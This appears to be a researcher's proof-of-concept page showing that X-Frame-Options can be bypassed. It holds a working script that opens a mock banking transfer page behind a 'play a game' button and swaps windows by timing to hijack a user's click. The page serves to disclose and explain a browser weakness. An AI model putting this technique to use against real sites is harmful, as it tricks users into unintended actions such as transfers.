<h3><i>X-Frame-Options</i> is worth less than you think</h3>

<script>
var w;
var dummy;
var it;

// Precache stuff.

x = new Image();
x.src = 'http://banking.beaver-peak.us/banking_interface/transfers/';

x2 = new Image();
x2.src = 'http://banking.beaver-peak.us/banking_interface/transfers/beaver-peak.jpg';

x3 = new Image();
x3.src = 'http://lcamtuf.coredump.cx/clickit/win.html';

x4 = new Image();
x4.src = 'http://lcamtuf.coredump.cx/clickit/win.jpg';

function prepare() {
  w = open('http://banking.beaver-peak.us/banking_interface/transfers/','_blank');
  setTimeout(complete, 300);
}

function complete() {
  w.location.href = 'http://lcamtuf.coredump.cx/clickit/attacker.html';
  setTimeout(goback, 1000);
}

function goback() {
  try {
    if (w.document.body.innerHTML == undefined) throw 1;
    setTimeout(goback, 100);
  } catch (e) {
    // That one case where prompts.tab_modal.enabled=true would have helped in Firefox...
    if (navigator.userAgent.indexOf('Firefox/') != -1)
      setTimeout('w.location.href = "http://lcamtuf.coredump.cx/clickit/win.html"', 1500);
    else
      setTimeout('w.location.href = "http://lcamtuf.coredump.cx/clickit/win.html"', 500);
  }
}

</script>
<p>
JavaScript allows you to exploit human cognitive abilities to a remarkable extent; tools such as
window positioning, <code>history.forward()</code> and <code>history.back()</code>, open some
scary possibilities that we are <a href="http://lcamtuf.blogspot.com/2011/12/x-frame-options-or-solving-wrong.html">completely unprepared to deal with</a>.
This proof-of-concept aims to demonstrate this; while it is intentionally crude and makes no real effort to
conceal its operation, the transitions <a href="http://lcamtuf.coredump.cx/switch/">can be made seamless</a> and very
difficult to perceive. Very accurate click prediction can be achieved by carefully measuring
mouse velocity and distance to destination, too.

<p>
I discuss these attacks and many other unsolved challenges in web app design in
<i><a href="http://lcamtuf.coredump.cx/tangled/">"The Tangled Web"</a></i>.
A similar approach poses a problem with many browser UIs; for that, 
<a href="http://lcamtuf.blogspot.com/2010/08/on-designing-uis-for-non-robots.html">check out this post</a>.
<p>
<input type=submit value="Click here to play a game" onclick="prepare()">